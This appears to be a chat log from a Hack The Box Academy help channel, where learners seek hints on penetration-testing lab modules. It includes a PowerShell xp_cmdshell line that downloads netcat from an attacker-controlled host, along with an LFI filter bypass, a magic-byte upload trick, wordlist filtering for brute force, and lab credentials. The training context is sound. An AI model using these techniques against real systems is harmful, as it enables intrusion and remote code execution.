THANKS !!

i know a bit of coding and made few projects

it was a little intro by me

👍 👍

Question on "Communication with Processes" windows priv escalation module

What is the correct format on the answer for the question "Which account has WRITE_DAC privileges over the \pipe\SQLLocal\SQLEXPRESS01 named pipe?"

I was able to local the pipe information ussing accesschk, but none of the answers are being accepted. Anyone around for a nudge? I've got my screenshot ready to show I'm not just looking for the answer without prior work put in

im stuck at this

Disregard, if anyone comes across this confused as i was, the whole service name needs to be entered (ie NT SERVICE longservicename)

which module?

targets not being recognized?

Getting started

Service scanning

guys how to hack someone's ip

which tool

what command

pls help

google

google?

ye

what command

or search

did you just came here to try to get someones ip?

no

seriously no

wich module are you in then?

try connect with smbclient?

yep

hmm, let me see if i've done that module already, hang tight

also tried with -N and -L

i just saw a google search that first ste to hack someone is to get his/her ip

thats why i asked

sorry if it is against the rules

even if you get their ip you need to know what to do next

yes

but i dont even know how to execute the first steo

step

also if you dont "hide" your ip they will know the connection came from you

yes

thank u

https://academy.hackthebox.com/ you do this you learn

by reverseshell right

by reverseshell right?

did you already bruteforce bobs password?

maybe

If i remember right, had to run hydra to get the weak password bob uses

guys which tools to use for hacking

what module is that? Password attacks?

Sign up for academy, and learn. Its free to begin

i get that but what tools

i know i can learn from that

but how to practice

YOu practice in academy

ok

got it

they teach you the tools, what they are used for, how they are used

getting started (service scanning) apparently this is a pain in the ass for everyone or most ppl

which section, I can look at my notes

sorry

also whatch youtube videos like networChuck

give me just a sec

yeah i did that

its very good

i know a bit of coding and hacking but not much

shares

The cyber mentor has some really good stuff on youtube as well

^^

also the first method to learn hacking is "googling" what you need

Can someone explain why my VPN doesn´t work. It has worked in the past but not anymore, + I don´t find any solutions in the FAQ or anywhere else

did you uninstall kali or update it?

can anyone help me on the skill assessment of Windows PE ?

the error shows that your missing the cipher you have set

you might check your openvpn config files and make sure you have the right ciphers installed

@glad solar what password were you trying?

In this case i have a new kali but what I ment is that it worked in the past on my vm

bob:Welcome1

trying to find user SID in powershell. I am using correct CMnd getting nothing

im a noob...need some help

strange, I got right in

ill keep trying

oh i see it

@lethal atlas

i did this

can you ping the host?

I dont know if assigning the username before or after matters. I guess try and see

can someone help me with information gathering-web edition

sure thing.

active subdomain enumeration I am betting

you should gamble more haha

nope same thing is happening

you do bob:Welcome1

correct?

yes sir

then wtf is happening

dm me and I will do a screen share

Can anyone help me with the last chapter/module on windows funamentals?

Anyone available to give me a nudge with File Upload Attacks - Skill Assessment? I am able to read the source code and found where and how the files are uploaded but need a nudge on understanding MIME type or if I am using the correct MIME type

Funny my company just got hit badly on their exchange servers

Upload an allowed file and intercept the request with Burp. Then adjust the data.
Otherwise the magic byte won't work...

hi, can someone help me with broken authentication skills assessment?

i having difficulty with bruteforcing the admin account password

i think mainly its my wordlist, but i wasnt sure if i am filter it right. the following is the command i use to filter it

egrep '^.{20,30}$' rockyou.txt| grep '^[[:upper:]]'| grep '[[:digit:]]$'| grep '[]$#@{]'

you wasn't supposed to brute force the password for the admin user, do it with the ||support|| user and ||decode his cookie||

I'm a script kiddy as it is called

Where can I learn py

And c++

ah ok, shall try bruting the support account now

oh wait i just use the magic number and it's working fine for me what additional do you need to change?

@vital adder btw, is my command to filter the wordlist correct? i am kinda skeptical about it

after your filter the rockyou wordlist you should have ||50|| or under password

#modules message

hold up 😂

how much did you have after your filter command?

19

I had trouble writing the Magic Bytes correctly. So I simply uploaded an allowed file and then adjusted the data accordingly.

oh then that's better

Cheers

nah, all invalid credentials

I downloaded an image, edited it with mousepad and deleted everything then pasted in the magic byte and command

ohhh and btw you only need 4-5 step (with a hex editor) to add the magic number correctly to your payload

shoot me a dm i'll help you with that

someone gave me a nudge, giving it a shot right now

nice try that and if you still have issue feel free to dm me

will do~ thanks

Having Troubles exploiting host 2 in the Shells and Payloads Live Engagement section. Would anyone have time to bounce some things off?

sure what's the issue?

When I find the exploit and try to get it into metasploit the number increases so its in there but when I search for it, it does not find it.

in metasploit after you import a exploit you need to run something like reload_all for metasploit to find it

after you run that try search the exploit nummber or if you change the name to something else search for that name

Is there an easy way to fix the split error that you get

what split error?

what options did you set in metasploit

also if you set the targeturl and the vhost to the ip that's the issue

yep you need to set the target url and the vhost to blog domain

that was it as soon as i set the url in the vhost. thank you for your helpo

Can someone help me with setting up the VPN?

download the file then start it with sudo openvpn Downloads/academy.ovpn &

Tried that, doesn't work

screen shot the error

There's no error

I simply can't ssh into the target

Timeout

what do you see when you ip a

1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp1s0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 52:54:00:f3:e9:3a brd ff:ff:ff:ff:ff:ff
    inet 192.168.122.238/24 brd 192.168.122.255 scope global dynamic noprefixroute enp1s0
       valid_lft 2423sec preferred_lft 2423sec
    inet6 fe80::1e80:af70:bbd4:105a/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever

And with VPN enabled:

└──╼ $ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp1s0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 52:54:00:f3:e9:3a brd ff:ff:ff:ff:ff:ff
    inet 192.168.122.238/24 brd 192.168.122.255 scope global dynamic noprefixroute enp1s0
       valid_lft 2364sec preferred_lft 2364sec
    inet6 fe80::1e80:af70:bbd4:105a/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever
4: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
    link/none 
    inet 10.10.15.186/23 scope global tun0
       valid_lft forever preferred_lft forever
    inet6 dead:beef:2::11b8/64 scope global 
       valid_lft forever preferred_lft forever
    inet6 fe80::a14e:6ada:e2cb:e0d6/64 scope link stable-privacy 
       valid_lft forever preferred_lft forever

ok so vpn is connected. lets see you ssh command

ssh htb-student@10.129.xxx.xxx

(xxx.xxx is the rest of the IP)

Here's the result:

└──╼ $ssh htb-student@10.129.xxx.xxx
Connection closed by 10.129.xxx.xxx port 22

are you sure ssh is open ? what module are you working on?

https://academy.hackthebox.com/module/23/section/622

It says "SSH to xxx with user [...]"

can you ping the target ip?

ehhh the command goes on and on

└──╼ $ping 10.129.29.112
PING 10.129.29.112 (10.129.29.112) 56(84) bytes of data.
64 bytes from 10.129.29.112: icmp_seq=1 ttl=63 time=29.4 ms
64 bytes from 10.129.29.112: icmp_seq=2 ttl=63 time=30.9 ms
64 bytes from 10.129.29.112: icmp_seq=3 ttl=63 time=28.7 ms
64 bytes from 10.129.29.112: icmp_seq=4 ttl=63 time=31.6 ms
64 bytes from 10.129.29.112: icmp_seq=5 ttl=63 time=28.9 ms
64 bytes from 10.129.29.112: icmp_seq=6 ttl=63 time=32.2 ms
64 bytes from 10.129.29.112: icmp_seq=7 ttl=63 time=30.5 ms
64 bytes from 10.129.29.112: icmp_seq=8 ttl=63 time=31.4 ms
64 bytes from 10.129.29.112: icmp_seq=9 ttl=63 time=28.2 ms
64 bytes from 10.129.29.112: icmp_seq=10 ttl=63 time=29.3 ms
64 bytes from 10.129.29.112: icmp_seq=11 ttl=63 time=28.9 ms
64 bytes from 10.129.29.112: icmp_seq=12 ttl=63 time=30.8 ms
64 bytes from 10.129.29.112: icmp_seq=13 ttl=63 time=35.3 ms
64 bytes from 10.129.29.112: icmp_seq=14 ttl=63 time=35.9 ms
64 bytes from 10.129.29.112: icmp_seq=15 ttl=63 time=29.6 ms
64 bytes from 10.129.29.112: icmp_seq=16 ttl=63 time=29.5 ms
64 bytes from 10.129.29.112: icmp_seq=17 ttl=63 time=32.9 ms
64 bytes from 10.129.29.112: icmp_seq=18 ttl=63 time=29.0 ms
64 bytes from 10.129.29.112: icmp_seq=19 ttl=63 time=29.3 ms

this is not the whole output

thats fine it wont end till you end it

oh okay lol xD

--- 10.129.29.112 ping statistics ---
143 packets transmitted, 143 received, 0% packet loss, time 142201ms
rtt min/avg/max/mdev = 27.540/31.563/88.248/5.243 ms

ok so ssh htb-student@10.129.29.112 works for me

hmmmm...

strange

I have a VPN on my host machine, could this be the troublemaker?

i dont see why, I use vpn from my VM

i was wondering for fuzzing web aplications, how come that ffuf shows a file with a 200 status but when a try to get it via cat it returns html?

did it return the status for a web page? or a txt file?

its returning the same webpage

its this module https://academy.hackthebox.com/module/23/section/1494

I would say maybe your command is not quite right

oh ok

feel free to dm and we can work on it

May I ask what VPN service you're using?

sorry, I misunderstood. I dont use a vpn service. I just connect to academy using vpn.

ahh okay I'll later try to disable it

So I disabled my VPN and tried connecting to the target and here's the output:

└──╼ $ssh htb-student@10.129.29.112
ssh: connect to host 10.129.29.112 port 22: No route to host

@half cave but you can ping 10.129.29.112?

how do i write this payload to a .svg file

i would use nano but vim or pico will also work. Or any text editor

actually not 😮

PING 10.129.29.112 (10.129.29.112) 56(84) bytes of data.
From 10.10.14.1 icmp_seq=1 Destination Host Unreachable
From 10.10.14.1 icmp_seq=2 Destination Host Unreachable
From 10.10.14.1 icmp_seq=3 Destination Host Unreachable
From 10.10.14.1 icmp_seq=4 Destination Host Unreachable
From 10.10.14.1 icmp_seq=5 Destination Host Unreachable

im properly stuck on Broken Authentication assessment, can anyone give me a push pls?

Okay I finally got it to work, I had to disable my host VPN

i can try

good job.

you can dm if still need help

damn skills assessment on password attacks is brutal

Hello, I am in the Getting Started module and in the Nibbles-Privilege Escalation section I get to the point of executing the monitor.sh file, but it is requiring me to input the nibbles user password when it says it shouldn't. Is there something I am overlooking?

Doesn't seem to be any forum discussions on it, so it has to be something I don't intuitively know after completing the rest of the module.

once logged in as nibbles you should be able to sudo the file without a password

yea, I ran it as nibbles, which is why I am lost. I'll get a screenshot.

with sudo

Ok, I don't know what changed. I reset the target machine 3 times and did the same thing. Only thing that changed was the IP of the target machine on my final attempt and it worked. Just gonna let that one go.

can anyone tell me if I am using the right wordlist for password attacks easy lab

For the Easy Lab you can use the list provided in the module

the basic list or the mut list?

Basic

ive been running the username.list provided against the mut list and found nothing yet

Hello,
I am having a bit of trouble with the Advanced File Disclosure section of the Web Attacks Module. Could someone assist me?
|| I feel like I should be editing the xxe.dtd file but I'm not quite sure how to...||

i can try

ok, want to do it in Dms?

if u don't want to spoil

kk

Hi, so im doing the linux fundementals module rn, and im wondering, is it normal that i dont understand 80% of the things that is being explained?

what do u mean ?

ya, I tend to struggle a lot with grasping it initially, but then I just read about it more online at various sources and then reread/redo course/exercises.

Like im completely new to this, 0 cyber sec background, never touched upon linux before. And the module is just a bunch of words i dont rlly get.

Okay i see, i'll just finish the module, and if i dont understand something ill just look it up

yeah if u are beginning it may be a bit strange/scary but ur gonna get used to it

take notes

and by using the commands again and again ur gonna find it easy to do

Okay will do

Also is it fine if i follow the course without having linux installed?

I read abt vms and stuff so i want to have linux on there if possible

I use VMware fusion with Parrot Sec on my main os, and it runs great. Virtual Box is an option too. Both are ran as VMs.

So to get it straight, you wont be installing linux on ur own pc right?

I have done a dual boot in past on a PC with Kali Linux and Windows, and I ended up breaking something in the bIOS settings and completed fudged it all up/haven't gotten it to work since (thank goodness it was crap computer haha). (dual boot is like not installing it on a VM but actually partitioning part of computer for it) But to answer your question: correct, it just installs the OS image onto a VM that you can easily turn on/delete/etc... Here is ParrotSec's instructions on installing it onto Oracle Virtual Box: https://www.parrotsec.org/docs/install-parrot-on-virtualbox.html

Ahh okay thank you, yeah i dont wanna mess up my pc lol

virtual box/vmware won't hurt, just dual boot stay away from.

hi! im doing the using web proxies course and there is a part where you need to fuzz for an md5 encrypted cookie. Can someone point me in the right way because i can seem to figure it out :/

" The directory we found above sets the cookie to the md5 hash of the username, as we can see the md5 cookie in the request for the (guest) user. Visit '/skills/' to get a request with a cookie, then try to use ZAP Fuzzer to fuzz the cookie for different md5 hashed usernames to get the flag. Use the "top-usernames-shortlist.txt" wordlist from Seclists."

FINALLY https://imgur.com/ND6Scvw.png

this is the longest i've done so far

the module that took the most time.

congrats!

Nice! How long did it take you?

since july 29

oh no my oldest file is july 25

even longer than that.

Not bad! What do you think was taking the most time for you? I'm slowly going through modules, but it feels like an eternity. Constantly taking screenshots, writing notes, etc.

i had stuff to do irl too but still, it's a long time.

well the only reason i did that active directory module like that is because i was trying to do the notes taking one

and it's like, take over the domain n finish the report

Ah, gotcha. I'm a long way from getting to that one. Sounds interesting.

i dont really keep notes until the past 3 or 4 modules

and it's just a text file that looks like this but uglier because it's just text and no cool formatting like the forum post

that forum post is practice making them more concise (5 easy steps to solve it the way i approached and modeled it)

but had to do tunnel and pivot module too in order to write that, which is not what everyone else is doing on the forum thread.

if i did not take notes it would be uglier than that or not exist at all, idk.

Is anyone available to answer a quick question for me about using ZAP in the Web Proxies module?

Gg

@west canopy you awake?

hey

On password attacks easy lab, I have gotten ssh access, but I cant find the path to get the root password. Lazagne errors out, I cant install anything, cant sudo, there is no mozilla, give me a hint bro..

@lethal atlas try checking ||bash history :)||

haha, I'm on this one right now. None of the techniques are working

@radiant dagger ready to have your mind blown?

all ears 😁

hi guys, i stuck on the footprint modul Section IMAP: Question: Try to access the emails on the IMAP server and submit the flag as the answer. (Format: HTB{...})

i tried openssl and curl to fetch the email but nothing works, any hint?

Is that the right access data for user and pwd?

yes

Just going over the Linux Priv Esc Module - Special Permissions but I can't get the answer correct - I believe my searches work fine and provide the answer. Any help appreciated 🙂

guys if i login on hack the box webiste

webiste

website*

i would get kali linux gui to practice right

or i have to install it sperately

seperately

@knotty crag hackthebox uses Parrot os not kali but you can use kali if you inatall it sperately

what tool is this

Could you get in?

I assume you mean curl

ok its curl

From man: DESCRIPTION
curl is a tool for transferring data from or to a server. It supports these protocols: DICT, FILE, FTP,
FTPS, GOPHER, GOPHERS, HTTP, HTTPS, IMAP, IMAPS, LDAP, LDAPS, MQTT, POP3, POP3S, RTMP, RTMPS, RTSP, SCP,
SFTP, SMB, SMBS, SMTP, SMTPS, TELNET or TFTP. The command is designed to work without user interaction.

   curl  offers  a busload of useful tricks like proxy support, user authentication, FTP upload, HTTP post, SSL
   connections, cookies, file transfer resume and more. As you will see below, the number of features will make
   your head spin.

i have a doubt

as i dont actually have a good pc

i just wanted to know that is it necessary to have a 8gb ram to run my workstation on hack the box

as it provides a lab

and a workstation

You can use a machine with 8Gb and a VM will run fine on 4GB. If you use the pwnbox then the processing is done at server level and you just work it through the browser

hi , i am stuck in Broken Authentication - Predictable Reset Token module at question 1 , as far as I know token is generated by hash of username and time then hash md5 , I tried converting datetime to epoch time but still getting got the wrong token

recommend 8gb because of the processing some different techinques require, fuzzing/webscanning

I think the issue he has maybe an older machine (unlikely to be linux) and as a starter for ten, he could at least do some training. Obviously 8 to 12 Gb for a VM is a nice to have that not always available.

you are right, btw have you completed de htb academy module called using web proxies?

if yes, can u send me a pm

Introduction to Bash Scripting/Conditional Execution
I feel like there is a whole bunch of information I'm suppose to be taught in this section prior to the question of "Create an "If-Else" condition in the "For"-Loop of the "Exercise Script" that prints you the number of characters of the 35th generated value of the variable "var". Submit the number as the answer.", as I have no idea where to begin, or what I'm looking at! Has anyone else get stuck here, and know what is going on, or what they are asking?

I'm afraid not - not touched that one yet.

aight np, its a hard module when you are starting out

anyone around to help me with active subdomain enumeration. this module is so desperately requiring a re-write update

OMG I had looked there, even made a note of that line but never tried it as the answer. My head is not in it lately.

hey guys im stuck on "Firewall and IDS/IPS Evasion - Hard Lab can anyone help me please? thanks

Could I get a mod or someone to take a look at the target instance for the "SeImpersonate and SeAssignPrimaryToken" section in the Windows Priv Esc module?

I've been unable to rdp into the target session with the credential provided: Authenticate to 10.129.43.43 with user "sql_dev" and password "Str0ng_P@ssw0rd!"

I've tried both "Str0ng_P@ssw0rd!" and "StrOng_P@sswOrd!", but the connection still fails

Able to connect to a different target instance like normal

I can try

Thanks I’ve had some help. Decided to skip today. Long day in work and I wanna relax 😂

https://tenor.com/view/lodibon-leau-du-bidon-gif-26295030

I have a question regards AD Skills Assessment Part II.
I got the xp_cmdshell access on database, now, the problem is downloading file to that machine, the current directory where i am C:\Windows\system32 does not have permissions to do anything, and i can't navigate or move from it to another dir. I tried with powershell downloading to specific folder, but that does not work either.

SQL> xp_cmdshell powershell.exe (New-Object Net.Webclient).Downloadfile('http://172.16.7.240:3333/nc64.exe', 'C:\Temp2\nc64.exe')
[-] ERROR(SQL01\SQLEXPRESS): Line 1: Incorrect syntax near '/'.

Any help is appreciated

Im stuck on footprinting-imap/pop3 I tried to use this email as the admin email but it says it's wrong... any hints?

@errant lava your command seems overly complicated.. simplify it up.

try openssl s_client -connect 10.129.123.78:imaps

I did that command and the same email shows up.

guys

i wanna ask for help]

Local file inclusion section basic bypasses

i tried every combination to bypass filters

still getting illegal path specified

need help

sstrange, I get something totally different

actually, no I got the same thing, that is just the first step

you then have to login

fetch the email and get the answer

ahh okay, I'll try that

Login with telnet?

i can get etc/passwd but am unable to get the flag what am i missing

what module is this?

assesment file upload

you need RCE for this the flag isn't named flag.txt

so find the upload path and all that s***

try ||....//|| and add more until you get the flag but if you add more then 15 that's too much and something is wrong

before that, still did not get to that

is there a way to use a find command to also list how many it found?

the manual is really big and im still looking for it with little success, thought rates could be used but dont know how to

Hmmmmmm

and also get RCE